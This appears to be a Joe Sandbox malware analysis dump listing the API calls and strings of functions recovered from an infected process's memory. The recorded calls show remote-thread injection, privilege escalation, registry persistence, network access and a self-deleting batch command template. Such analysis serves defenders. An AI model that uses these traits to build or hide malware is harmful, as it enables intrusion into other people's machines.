accept.WS2_32(?,00000000,00000000), ref: 00034F45
WaitForMultipleObjects.KERNEL32(?,?,00000000,00000000), ref: 00034F59

Part of subcall function 0004675E: shutdown.WS2_32(00000000,00000002), ref: 00046766
Part of subcall function 0004675E: #3.WS2_32(00000000), ref: 0004676D

CloseHandle.KERNEL32(?), ref: 00034F7A

Part of subcall function 00046B8E: ReleaseMutex.KERNEL32(00000000,00043021,?,?,?), ref: 00046B92

Part of subcall function 0003E89E: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Xyuxy,00000000,00000001,?,?,76C605D7,00000000), ref: 0003E8E0

Part of subcall function 00034C68: getsockname.WS2_32(?,?,?), ref: 00034CBE
Part of subcall function 00034C68: CloseHandle.KERNEL32(?), ref: 00034CE2

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 000431CC, Relevance: 12.1, APIs: 8, Instructions: 114

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000431ED
Process32FirstW.KERNEL32(000001E6,?), ref: 00043216

Part of subcall function 0004245B: CreateMutexW.KERNEL32(00052C30,00000001,?,00052E70,76C605D7,?,00000002,?,76C605D7), ref: 000424A3
Part of subcall function 0004245B: GetLastError.KERNEL32 ref: 000424AF
Part of subcall function 0004245B: CloseHandle.KERNEL32(00000000), ref: 000424BD

OpenProcess.KERNEL32(00000400,00000000,?,?,?,76C605D7,00000000), ref: 00043271
CloseHandle.KERNEL32(?), ref: 0004330E

Part of subcall function 000449D2: OpenProcessToken.ADVAPI32(?,00000008,?,76C61857,?,?,00042326,000000FF,00052C08,?,?,00000000), ref: 000449E2
Part of subcall function 000449D2: GetTokenInformation.KERNELBASE(?,0000000C,00000000,00000004,00000000,?,?,?,00042326,000000FF,00052C08), ref: 00044A0E
Part of subcall function 000449D2: CloseHandle.KERNEL32(?), ref: 00044A23

CloseHandle.KERNEL32(00000000), ref: 0004328E
GetLengthSid.ADVAPI32(00000000,?,76C605D7,00000000), ref: 000432A1

Part of subcall function 00043346: HeapAlloc.KERNEL32(00000008,-00000003,000436F5,?,?,00000000,000441E1,?,00042070,?,?,?,00044191,?,?,?), ref: 00043368
Part of subcall function 00043346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,000436F5,?,?,00000000,000441E1,?,00042070,?,?,?,00044191,?,?), ref: 00043379

Part of subcall function 00043048: OpenProcess.KERNEL32(0000047A,00000000,?,?,00000000), ref: 00043157
Part of subcall function 00043048: CreateRemoteThread.KERNEL32(00000000,00000000,00000000,-00095903,00000000,00000000,00000000), ref: 00043185
Part of subcall function 00043048: WaitForSingleObject.KERNEL32(00000000,00002710), ref: 00043198
Part of subcall function 00043048: CloseHandle.KERNEL32(?), ref: 000431A1
Part of subcall function 00043048: VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000,?,?,00000000), ref: 000431B5
Part of subcall function 00043048: CloseHandle.KERNEL32(00000000), ref: 000431BC

Process32NextW.KERNEL32(000001E6,0000022C), ref: 0004331A
CloseHandle.KERNEL32(000001E6), ref: 0004332B

Part of subcall function 000433BB: HeapFree.KERNEL32(00000000,00000000,00044BB2), ref: 000433CE

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0003B11C, Relevance: 12.1, APIs: 8, Instructions: 107

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0003B130
ReleaseMutex.KERNEL32(?), ref: 0003B14F
GetWindowRect.USER32(?,?), ref: 0003B15C
IsRectEmpty.USER32(?), ref: 0003B1E0
GetWindowLongW.USER32(?,000000F0), ref: 0003B1EF
GetParent.USER32(?), ref: 0003B205
MapWindowPoints.USER32(00000000,00000000), ref: 0003B20E
SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 0003B232

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 000414C3, Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 367

APIs

Part of subcall function 0004433F: CharLowerA.USER32(00000000), ref: 00044420
Part of subcall function 0004433F: CharLowerA.USER32(?), ref: 0004442D

Part of subcall function 00043346: HeapAlloc.KERNEL32(00000008,-00000003,000436F5,?,?,00000000,000441E1,?,00042070,?,?,?,00044191,?,?,?), ref: 00043368
Part of subcall function 00043346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,000436F5,?,?,00000000,000441E1,?,00042070,?,?,?,00044191,?,?), ref: 00043379

Part of subcall function 00047FE1: StrCmpNIA.SHLWAPI(00000001,nbsp;,00000005), ref: 00048104

Part of subcall function 0004338B: HeapAlloc.KERNEL32(00000008,-00000004,00044B59,00000000,?,?,?,00041E08,00000000,000422ED,?,?,00000000), ref: 0004339C

InternetCrackUrlA.WININET ref: 000417AC
GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 000417CA

Part of subcall function 000440AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 000440CF

LeaveCriticalSection.KERNEL32(00052AC8,?,?), ref: 0004194D

Part of subcall function 00044660: CryptAcquireContextW.ADVAPI32(00048C87,00000000,00000000,00000001,F0000040,?,00048C87,?,00000030,?,?,?,000491A0,00053EC0), ref: 00044679
Part of subcall function 00044660: CryptCreateHash.ADVAPI32(00048C87,00008003,00000000,00000000,00000030,?,00048C87,?,00000030,?,?,?,000491A0,00053EC0), ref: 00044691
Part of subcall function 00044660: CryptHashData.ADVAPI32(00000030,00000010,00048C87,00000000,?,00048C87), ref: 000446AD
Part of subcall function 00044660: CryptGetHashParam.ADVAPI32(00000030,00000002,00000030,00000010,00000000,?,00048C87), ref: 000446C5
Part of subcall function 00044660: CryptDestroyHash.ADVAPI32(00000030,?,00048C87), ref: 000446DC
Part of subcall function 00044660: CryptReleaseContext.ADVAPI32(00048C87,00000000,?,00048C87,?,00000030,?,?,?,000491A0,00053EC0), ref: 000446E6

GetLocalTime.KERNEL32(?,?,?,00000000,00000001,?), ref: 000418E4

Part of subcall function 0004763A: RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,00000002,00000000,00000004,00000000,80000001,?,?,00049EAB,?,?,00000004), ref: 00047658
Part of subcall function 0004763A: RegSetValueExW.KERNEL32(00000004,00000004,00000000,?,?,00049EAB,?,?,00049EAB,?,?,00000004,?,00000004), ref: 00047672
Part of subcall function 0004763A: RegCloseKey.ADVAPI32(00000004,?,?,00049EAB,?,?,00000004,?,00000004), ref: 00047681

EnterCriticalSection.KERNEL32(00052AC8), ref: 00041910

Part of subcall function 000433BB: HeapFree.KERNEL32(00000000,00000000,00044BB2), ref: 000433CE

Strings

?*, xrefs: 000414FD

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 000363F0, Relevance: 10.7, APIs: 7, Instructions: 216

APIs

Part of subcall function 00042507: CreateMutexW.KERNEL32(00052C30,00000000,?,?,?,?,?), ref: 00042528

Part of subcall function 0004262D: WaitForSingleObject.KERNEL32(00000000,0003776D), ref: 00042635

Part of subcall function 00035ECF: PathRemoveFileSpecW.SHLWAPI(000525D0), ref: 00035F07
Part of subcall function 00035ECF: PathRenameExtensionW.SHLWAPI(00000000,.tmp), ref: 00035F23
Part of subcall function 00035ECF: GetFileAttributesW.KERNEL32(000523C8,000525D0,000525D0,00000000,00020000,000369C9,00000001,?,8793AEF2,00000002,00002723,00020000,00000000,00002722,00020000,?), ref: 00035F46

GetFileAttributesW.KERNEL32(?,00000000,?,00000000,00000330,?,?,00000102), ref: 00036538
GetFileAttributesW.KERNEL32(000523C8), ref: 0003654B
CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00036571
CloseHandle.KERNEL32(00000000), ref: 0003658F
lstrcmpiW.KERNEL32(?,?), ref: 000365BF
MoveFileExW.KERNEL32(?,?,0000000B), ref: 000365E7

Part of subcall function 00036BD7: RegOpenKeyExW.ADVAPI32(80000001,000527F0,00000000,00000001,?,?), ref: 00036C00

Part of subcall function 000433BB: HeapFree.KERNEL32(00000000,00000000,00044BB2), ref: 000433CE

Part of subcall function 00036010: GetTickCount.KERNEL32(0000271B,00020000,00000000,00002719,00020000,00000000,00000000,000000FF,00000000), ref: 0003610F
Part of subcall function 00036010: GetUserDefaultUILanguage.KERNEL32(0000271C,00020000,?,00000000,000000FF,00000000), ref: 00036162
Part of subcall function 00036010: GetModuleFileNameW.KERNEL32(00000000,?,00000103,00000000,000000FF,00000000), ref: 000361A4
Part of subcall function 00036010: GetUserNameExW.SECUR32(00000002,?,00000104), ref: 000361E6

Part of subcall function 0003680D: WaitForSingleObject.KERNEL32(?,00001388), ref: 0003685A
Part of subcall function 0003680D: Sleep.KERNEL32(00001388,?,?,?,00000000,?,?,-78D0C214,00000002), ref: 00036869

Part of subcall function 00049354: FlushFileBuffers.KERNEL32(00000000), ref: 00049360
Part of subcall function 00049354: CloseHandle.KERNEL32(?), ref: 00049368

Part of subcall function 00048716: SetFileAttributesW.KERNEL32(00000080,00000080,0004B4CD,?), ref: 0004871F
Part of subcall function 00048716: DeleteFileW.KERNEL32(?), ref: 00048729

Part of subcall function 000486EF: GetFileSizeEx.KERNEL32(0004925C,0004925C,?,?,?,0004925C,00000000), ref: 000486FB

WaitForSingleObject.KERNEL32(00007530,?), ref: 0003668B

Part of subcall function 00046B8E: ReleaseMutex.KERNEL32(00000000,00043021,?,?,?), ref: 00046B92

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00048AE4, Relevance: 10.6, APIs: 7, Instructions: 109

APIs

Part of subcall function 00048C40: PathCombineW.SHLWAPI(00041F45,00041F45,?), ref: 00048C5F

FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00048B23
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00048B4A

Part of subcall function 00048AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 00048B94
Part of subcall function 00048AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 00048BC1
Part of subcall function 00048AE4: Sleep.KERNEL32(00000000,?,?), ref: 00048BF1

FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00048C1F
FindClose.KERNEL32(?,?,?,?,00000000), ref: 00048C31

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0004A298, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 94

APIs

ResetEvent.KERNEL32(?), ref: 0004A2A6

Part of subcall function 0004338B: HeapAlloc.KERNEL32(00000008,-00000004,00044B59,00000000,?,?,?,00041E08,00000000,000422ED,?,?,00000000), ref: 0004339C

InternetSetStatusCallbackW.WININET(?,0004A24F), ref: 0004A2DB
InternetReadFileExA.WININET ref: 0004A31B
GetLastError.KERNEL32 ref: 0004A325

Part of subcall function 00046B28: TranslateMessage.USER32(?), ref: 00046B4A
Part of subcall function 00046B28: DispatchMessageW.USER32(?), ref: 00046B55
Part of subcall function 00046B28: PeekMessageW.USER32(00000000), ref: 00046B65
Part of subcall function 00046B28: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00046B79

InternetSetStatusCallbackW.WININET(?,?), ref: 0004A389

Part of subcall function 000433BB: HeapFree.KERNEL32(00000000,00000000,00044BB2), ref: 000433CE

Part of subcall function 00043346: HeapAlloc.KERNEL32(00000008,-00000003,000436F5,?,?,00000000,000441E1,?,00042070,?,?,?,00044191,?,?,?), ref: 00043368
Part of subcall function 00043346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,000436F5,?,?,00000000,000441E1,?,00042070,?,?,?,00044191,?,?), ref: 00043379

Strings

Z&d&2&n&<&F&, xrefs: 0004A31B

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00044E7B, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85

APIs

Part of subcall function 00048737: GetTempPathW.KERNEL32(000000F6,?), ref: 0004874E

CharToOemW.USER32(?,?), ref: 00044EAB
GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 00044F2F

Part of subcall function 00048716: SetFileAttributesW.KERNEL32(00000080,00000080,0004B4CD,?), ref: 0004871F
Part of subcall function 00048716: DeleteFileW.KERNEL32(?), ref: 00048729

Part of subcall function 0004856B: CreateFileW.KERNEL32(00044E95,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00048585
Part of subcall function 0004856B: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 000485A8
Part of subcall function 0004856B: CloseHandle.KERNEL32(00000000), ref: 000485B5

Part of subcall function 000433BB: HeapFree.KERNEL32(00000000,00000000,00044BB2), ref: 000433CE

Part of subcall function 000440AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 000440CF

Strings

bat, xrefs: 00044E8B
@echo off%sdel /F "%s", xrefs: 00044EBE
/c "%s", xrefs: 00044F01
ComSpec, xrefs: 00044F2A

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0004795E, Relevance: 10.6, APIs: 7, Instructions: 65

APIs

SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 0004797D
PathAddBackslashW.SHLWAPI(?), ref: 00047994
PathRemoveBackslashW.SHLWAPI(?), ref: 000479A5
PathRemoveFileSpecW.SHLWAPI(?), ref: 000479B2
PathAddBackslashW.SHLWAPI(?), ref: 000479C3
GetVolumeNameForVolumeMountPointW.KERNEL32(?,?,00000064), ref: 000479D2
CLSIDFromString.OLE32(?,?), ref: 000479EC

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 000478D5, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60

APIs

RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 000478FD

Part of subcall function 0004773A: CharUpperW.USER32(00000000), ref: 0004785B

RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00000003,00000000,?,?,00000002,?), ref: 0004792F
RegCloseKey.ADVAPI32(?), ref: 00047938
RegCloseKey.ADVAPI32(?), ref: 00047952

Strings

d, xrefs: 00047943
SOFTWARE\Microsoft, xrefs: 000478F0

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00044A87, Relevance: 10.6, APIs: 7, Instructions: 52

APIs

GetCurrentThread.KERNEL32(00000020,00000000,0004C9A1,00000000,?,?,?,?,0004C9A1,SeTcbPrivilege), ref: 00044A97
OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0004C9A1,SeTcbPrivilege), ref: 00044A9E
OpenProcessToken.ADVAPI32(000000FF,00000020,0004C9A1,?,?,?,?,0004C9A1,SeTcbPrivilege), ref: 00044AB0
LookupPrivilegeValueW.ADVAPI32(00000000,0004C9A1,?), ref: 00044AD4
AdjustTokenPrivileges.ADVAPI32(0004C9A1,00000000,00000001,00000000,00000000,00000000), ref: 00044AE9
GetLastError.KERNEL32 ref: 00044AF3
CloseHandle.KERNEL32(0004C9A1), ref: 00044B02

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00046A3C, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43

APIs

Part of subcall function 00044A87: GetCurrentThread.KERNEL32(00000020,00000000,0004C9A1,00000000,?,?,?,?,0004C9A1,SeTcbPrivilege), ref: 00044A97
Part of subcall function 00044A87: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0004C9A1,SeTcbPrivilege), ref: 00044A9E
Part of subcall function 00044A87: OpenProcessToken.ADVAPI32(000000FF,00000020,0004C9A1,?,?,?,?,0004C9A1,SeTcbPrivilege), ref: 00044AB0
Part of subcall function 00044A87: LookupPrivilegeValueW.ADVAPI32(00000000,0004C9A1,?), ref: 00044AD4
Part of subcall function 00044A87: AdjustTokenPrivileges.ADVAPI32(0004C9A1,00000000,00000001,00000000,00000000,00000000), ref: 00044AE9
Part of subcall function 00044A87: GetLastError.KERNEL32 ref: 00044AF3
Part of subcall function 00044A87: CloseHandle.KERNEL32(0004C9A1), ref: 00044B02

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;CIOI;NRNWNX;;;LW),00000001,00000000,00000000), ref: 00046A5B
GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,00000000), ref: 00046A77
SetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,?), ref: 00046A8E
LocalFree.KERNEL32(00000000), ref: 00046A9D

Strings

SeSecurityPrivilege, xrefs: 00046A43
S:(ML;CIOI;NRNWNX;;;LW), xrefs: 00046A56

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0003B31C, Relevance: 9.2, APIs: 6, Instructions: 197

APIs

GetAncestor.USER32(?,00000002), ref: 0003B345
SendMessageTimeoutW.USER32(?,00000021,?,?,00000002,00000064,?), ref: 0003B370
PostMessageW.USER32(?,00000020,?,00000000), ref: 0003B3B2

Part of subcall function 0003B23D: GetTickCount.KERNEL32 ref: 0003B2A3
Part of subcall function 0003B23D: GetClassLongW.USER32(?,000000E6), ref: 0003B2D8

GetWindowThreadProcessId.USER32(?,00000000), ref: 0003B448
PostMessageW.USER32(?,00000112,?,?), ref: 0003B49B
GetWindowThreadProcessId.USER32(?,00000000), ref: 0003B4DA

Part of subcall function 0003B0AD: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0003B0B3
Part of subcall function 0003B0AD: ReleaseMutex.KERNEL32(?), ref: 0003B0E7
Part of subcall function 0003B0AD: IsWindow.USER32(?), ref: 0003B0EE
Part of subcall function 0003B0AD: PostMessageW.USER32(?,00000215,00000000,?), ref: 0003B108
Part of subcall function 0003B0AD: SendMessageW.USER32(?,00000215,00000000,?), ref: 0003B110

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00039694, Relevance: 9.2, APIs: 6, Instructions: 175

APIs

Part of subcall function 00048C40: PathCombineW.SHLWAPI(00041F45,00041F45,?), ref: 00048C5F

Part of subcall function 0004338B: HeapAlloc.KERNEL32(00000008,-00000004,00044B59,00000000,?,?,?,00041E08,00000000,000422ED,?,?,00000000), ref: 0004339C

GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00039709
StrStrIW.SHLWAPI(?,?), ref: 00039796
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 000397BE
GetPrivateProfileIntW.KERNEL32(?,?,00000015,?), ref: 000397DB
GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 0003980C
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 0003982D

Part of subcall function 000440AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 000440CF

Part of subcall function 000433BB: HeapFree.KERNEL32(00000000,00000000,00044BB2), ref: 000433CE

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0004A3B1, Relevance: 9.2, APIs: 6, Instructions: 153

APIs

EnterCriticalSection.KERNEL32(00053F24), ref: 0004A3C2
LeaveCriticalSection.KERNEL32(00053F24), ref: 0004A425

Part of subcall function 0004A298: ResetEvent.KERNEL32(?), ref: 0004A2A6
Part of subcall function 0004A298: InternetSetStatusCallbackW.WININET(?,0004A24F), ref: 0004A2DB
Part of subcall function 0004A298: InternetReadFileExA.WININET ref: 0004A31B
Part of subcall function 0004A298: GetLastError.KERNEL32 ref: 0004A325
Part of subcall function 0004A298: InternetSetStatusCallbackW.WININET(?,?), ref: 0004A389

EnterCriticalSection.KERNEL32(00053F24), ref: 0004A442
GetUrlCacheEntryInfoW.WININET(?,00000000,000000FF), ref: 0004A4C6

Part of subcall function 0004856B: CreateFileW.KERNEL32(00044E95,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00048585
Part of subcall function 0004856B: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 000485A8
Part of subcall function 0004856B: CloseHandle.KERNEL32(00000000), ref: 000485B5

Part of subcall function 000433BB: HeapFree.KERNEL32(00000000,00000000,00044BB2), ref: 000433CE

Part of subcall function 000454F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 00045505
Part of subcall function 000454F1: GetLastError.KERNEL32 ref: 0004550F
Part of subcall function 000454F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 0004552F

Part of subcall function 000414C3: InternetCrackUrlA.WININET ref: 000417AC
Part of subcall function 000414C3: GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 000417CA
Part of subcall function 000414C3: GetLocalTime.KERNEL32(?,?,?,00000000,00000001,?), ref: 000418E4
Part of subcall function 000414C3: EnterCriticalSection.KERNEL32(00052AC8), ref: 00041910
Part of subcall function 000414C3: LeaveCriticalSection.KERNEL32(00052AC8,?,?), ref: 0004194D

Part of subcall function 0004338B: HeapAlloc.KERNEL32(00000008,-00000004,00044B59,00000000,?,?,?,00041E08,00000000,000422ED,?,?,00000000), ref: 0004339C

SetLastError.KERNEL32(00002EE4), ref: 0004A51C
LeaveCriticalSection.KERNEL32(00053F24), ref: 0004A585

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0003929D, Relevance: 9.1, APIs: 6, Instructions: 148

APIs

Part of subcall function 0004338B: HeapAlloc.KERNEL32(00000008,-00000004,00044B59,00000000,?,?,?,00041E08,00000000,000422ED,?,?,00000000), ref: 0004339C

GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 000392D4
StrStrIW.SHLWAPI(?,?), ref: 0003935C
StrStrIW.SHLWAPI(?,?), ref: 0003936D
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00039389
GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 000393A7
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 000393C1

Part of subcall function 000440AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 000440CF

Part of subcall function 000433BB: HeapFree.KERNEL32(00000000,00000000,00044BB2), ref: 000433CE

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00041049, Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 395

APIs

EnterCriticalSection.KERNEL32(00052AC8), ref: 00041064
LeaveCriticalSection.KERNEL32(00052AC8), ref: 000410E7
InternetCrackUrlA.WININET(?,?,00000000,?), ref: 000411B2

Part of subcall function 0004AE54: EnterCriticalSection.KERNEL32(00053FB4,?,000411CF,?), ref: 0004AE5B
Part of subcall function 0004AE54: LeaveCriticalSection.KERNEL32(00053FB4), ref: 0004AE90

Part of subcall function 0004AE9A: EnterCriticalSection.KERNEL32(00053FB4,?,00000000,000413AE,00000000), ref: 0004AEA6
Part of subcall function 0004AE9A: LeaveCriticalSection.KERNEL32(00053FB4), ref: 0004AEF1

InternetCrackUrlA.WININET(?,00000010,00000000,?), ref: 000413EC

Part of subcall function 000433BB: HeapFree.KERNEL32(00000000,00000000,00044BB2), ref: 000433CE

Part of subcall function 00040AA1: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 00040C73
Part of subcall function 00040AA1: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 00040C93
Part of subcall function 00040AA1: RegCloseKey.ADVAPI32(?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 00040CA6
Part of subcall function 00040AA1: GetLocalTime.KERNEL32(?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 00040CB5

Part of subcall function 00049B3E: CreateMutexW.KERNEL32(Function_00022C30,00000000,00053F40,?,?,?,000379E5), ref: 00049B66

Strings

, xrefs: 00041301

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0004D325, Relevance: 9.1, APIs: 6, Instructions: 78

APIs

Part of subcall function 00042828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 000428A1

PathRemoveFileSpecW.SHLWAPI(?), ref: 0004D34A
PathRemoveFileSpecW.SHLWAPI(?), ref: 0004D35D

Part of subcall function 0004C86B: SetEvent.KERNEL32(0004D36D,00000000), ref: 0004C871
Part of subcall function 0004C86B: WaitForSingleObject.KERNEL32(0000000C,000000FF), ref: 0004C884

Part of subcall function 0003BCAF: SHDeleteValueW.SHLWAPI(80000001,?,?), ref: 0003BCEC
Part of subcall function 0003BCAF: Sleep.KERNEL32(000001F4), ref: 0003BCFB
Part of subcall function 0003BCAF: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?), ref: 0003BD11

Part of subcall function 00048A29: FindFirstFileW.KERNEL32(?,?,?,?), ref: 00048A5A
Part of subcall function 00048A29: FindNextFileW.KERNEL32(00000000,?), ref: 00048AB5
Part of subcall function 00048A29: FindClose.KERNEL32(00000000), ref: 00048AC0
Part of subcall function 00048A29: SetFileAttributesW.KERNEL32(?,00000080,?,?), ref: 00048ACC
Part of subcall function 00048A29: RemoveDirectoryW.KERNEL32(?), ref: 00048AD3

SHDeleteKeyW.SHLWAPI(80000001,?,00000003,00000000), ref: 0004D39B
CharToOemW.USER32(?,?), ref: 0004D3B7
CharToOemW.USER32(?,?), ref: 0004D3C6

Part of subcall function 000440F2: wvnsprintfA.SHLWAPI(?,0000026C,?,?), ref: 0004410D

ExitProcess.KERNEL32(00000000), ref: 0004D41C

Part of subcall function 00044E7B: CharToOemW.USER32(?,?), ref: 00044EAB
Part of subcall function 00044E7B: GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 00044F2F

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00047AF0, Relevance: 9.1, APIs: 6, Instructions: 72

APIs

WindowFromPoint.USER32(?,?), ref: 00047B0C
SendMessageTimeoutW.USER32(00000000,00000084,00000000,?,00000002,?,?), ref: 00047B3D
GetWindowLongW.USER32(00000000,000000F0), ref: 00047B61
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00047B72
GetWindowLongW.USER32(?,000000F0), ref: 00047B8F
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00047B9D

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 000485D0, Relevance: 9.1, APIs: 6, Instructions: 68

APIs

CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000), ref: 000485F5
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00042D27,?,?,00000000), ref: 00048608
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,00042D27,?,?,00000000), ref: 00048630
ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 00048648
VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,00042D27,?,?,00000000), ref: 00048662
CloseHandle.KERNEL32(?), ref: 0004866B

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

